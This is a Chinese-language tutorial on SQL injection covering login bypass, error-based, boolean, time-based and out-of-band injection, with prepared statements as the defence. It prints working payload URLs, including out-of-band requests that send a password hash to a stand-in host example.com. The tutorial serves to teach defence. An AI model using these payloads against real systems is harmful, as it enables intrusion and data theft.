什么是 SQL 注入，有哪些类型，如何预防？

SQL注入漏是系统漏洞中一种比较严重的漏洞，如果说数据是系统的核心，那么SQL注入就是直插系统核心的漏洞。一直以来SQL注入漏洞就被列入OWASP最常见和影响最广泛的十大漏洞列表中。

顾名思义，SQL注入漏洞是攻击者将恶意内容注入到SQL语句。

为了充分理解这个问题，我们首先必须了解服务器端脚本语言如何处理SQL查询。

例如：Web应用程序中的功能生成了一个带有以下SQL语句的字符串：

SELECT * FROM users WHERE username = 'bob' AND password = 'mysecretpw'

这个SQL语句被传递给应用程序的一个函数，该函数将字符串发送到数据库，之后SQL在数据库中被解析、执行并返回结果。

我们可以看到这个SQL包含了一些特殊字符：

• * （星号）是SQL数据库返回所选数据库行的所有列的指令。
• =（等号）是一条用于使SQL数据库仅返回与搜索到的字符串匹配的值指令。
• '（单引号）用于告诉SQL数据库搜索字符串的开始或结束位置。

在Web应用设计上，往往需要把SQL中的参数设计成可配置的变量，例如：在执行用户登录的过程中使用“$user”和“$password”的值进行SQL查询。

SELECT * FROM users WHERE username = '$user' AND password
= '$password'

这时，如果应用程序如果没有对输入进行处理，攻击者可以很容易在语句中插入一些特殊的SQL语法，例如：

SELECT * FROM users WHERE username = 'admin'; -- ' AND
password = 'anything'

其中，admin'; --  就是攻击者输入到$user变量的内容，其中包含两个新的特殊字符。

分号“;”用于指示SQL解析器当前语句已经结束。

双连字符“--”用于指示SQL解析器该行的其余部分是注释，不应该被执行。

通过这个SQL注入，攻击者有效地删除了密码验证，并返回admin用户的数据。最终导致攻击者可以使用管理员帐户登录，而无需指定密码。

SQL注入漏洞的影响

利用SQL注入，攻击者可以做很多事情，比如：

• 添加、删除、编辑或读取数据库中的内容。
• 从数据库服务器上的文件读取源代码。
• 将文件写入数据库服务器。

除此之外，甚至可能完全接管数据库和Web服务器。

常见的SQL注入类型

攻击者可以通过各种方式利用SQL注入漏洞从服务器中窃取数据。常见的方法包括基于错误、基于条件（真/假）和基于时间等方式来检索数据。

(1) 基于错误的SQL注入

利用基于错误的SQL注入漏洞，攻击者可以从可见的数据库错误中检索表名和内容等信息。

例如：

http://localhost:8080/index.php?id=1+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

这个请求会返回一个错误：

Duplicate entry 'database1' for key 'group_key'

因此，在生产系统上禁用错误消息有助于防止攻击者收集此类信息。

(2) 基于布尔的SQL注入

当SQL查询失败时，页面上没有可见的错误消息，使得攻击者难以从应用程序中获取到信息。但是，仔细观察页面，仍然可以判断是可以攻击并提取信息，当SQL查询失败时，有时网页的某些部分会消失、改变或者整个网站无法加载。这些预示着，输入的参数可以用来攻击网站，或者提取数据。

例如：

攻击者可以通过在SQL查询中插入条件来测试：

http://localhost:8080/index?id=1+AND+1=1

如果页面可以正常加载，则可能表明它易受SQL注入攻击。可以肯定的是，攻击者通常会尝试使用以下方法来触发错误结果：

http://localhost:8080/index?id=1+AND+1=2

由于条件为false，如果没有返回任何结果或页面无法正常工作（例如，缺少文本或显示白色页面），则可能表明该页面容易受到SQL注入的攻击。

下面是如何以这种方式提取数据的示例：

http://localhost:8080/index?id=1+AND+IF(version()+LIKE+'5%',true,false)

通过这个请求，如果数据库版本为5.x，则页面应该会照常加载。但是，如果数据库版本不同，它的结果会有所不同，例如显示一个空页面或者一些空白内容，这也表明它是否容易受到SQL注入的攻击。

(3) 基于时间的SQL注入

在某些情况下，即使SQL查询对页面的输出没有任何明显的影响，仍然可以从底层数据库中提取信息。

黑客可以通过数据库的响应等待时间来进一步确定。一般情况下如果页面快速加载，那么一般不容易受到攻击；如果加载时间将比平时长，那么它可能比较容易受到攻击。在检测是否有漏洞时，SQL语法可能采用类似基于布尔的SQL注入漏洞中使用的语法。但是可以额外设置一个可测量的睡眠时间，IF函数z中的“true” 替换为“sleep(3)，指示数据库睡眠三秒：

http://localhost:8080/index?id=1+AND+IF(version()+LIKE+'5%',sleep(3),false)

如果页面加载的时间比通常要长，则可以判断数据库版本为5.x。

(4) 带外SQL注入漏洞

攻击者从数据库中检索信息的主要方法是使用带外SQL注入技术。这种类型的攻击通常的做法是将数据直接从数据库服务器发送到由攻击者控制的机器。

例如：

http://localhost:8080/index?id=1+AND+(SELECT+LOAD_FILE(concat('\\\\',(SELECT @@version),'example.com\\')))

或者

http://localhost:8080/index?query=declare @pass nvarchar(100);SELECT @pass=(SELECT TOP 1 password_hash FROM users);exec('xp_fileexist ''\\' + @pass + '.example.com\c$\boot.ini''')

在这些请求中，攻击者通过执行SQL使得数据库向可控的服务器发出DNS请求，这意味着攻击者不需要直接看到注入SQL的执行结果，而是可以通过可控制的服务器查看到数据库服务器发送的DNS请求。

(5) 其他类型

SQL注入的类型和方式也随着数据库和应用开发技术的发展不断变化，除了以上注入类型之外，还有许多，例如：

如何防止SQL注入

在应用程序服务端，并没有什么好的办法确定SQL查询语句是否被恶意注入。所能做的就是向数据库服务器发送一个SQL字符串，然后等待数据库解释并返回。

但是有一个办法就是构建预处理SQL语句，之后执行SQL，并向其传输变量，这些变量的内容在被执行之前可以被格式化，这个有点像printf函数。

例如：

构建预处理

$stmt = $dbh->prepare("SELECT * FROM users WHERE USERNAME = ? AND PASSWORD = ?");

执行：；

$stmt->execute(array($username, $password));

为了预防SQL注入，除了在开发阶段进行规范之外，还可以在一些外部进行预防，例如：

• 更新中间件和数据库服务器，例如SSH、OpenSSL、Postfix，甚至操作系统本身。
• 在Web服务器层面别阻止一些不规范的URL。
• 在数据库层面，设置保护数据库的权限。
• 将敏感、机密数据进行分库隔离存储。
• 使用入侵检测系统、防火墙等，在攻击Web应用程序之前分析HTTP请求。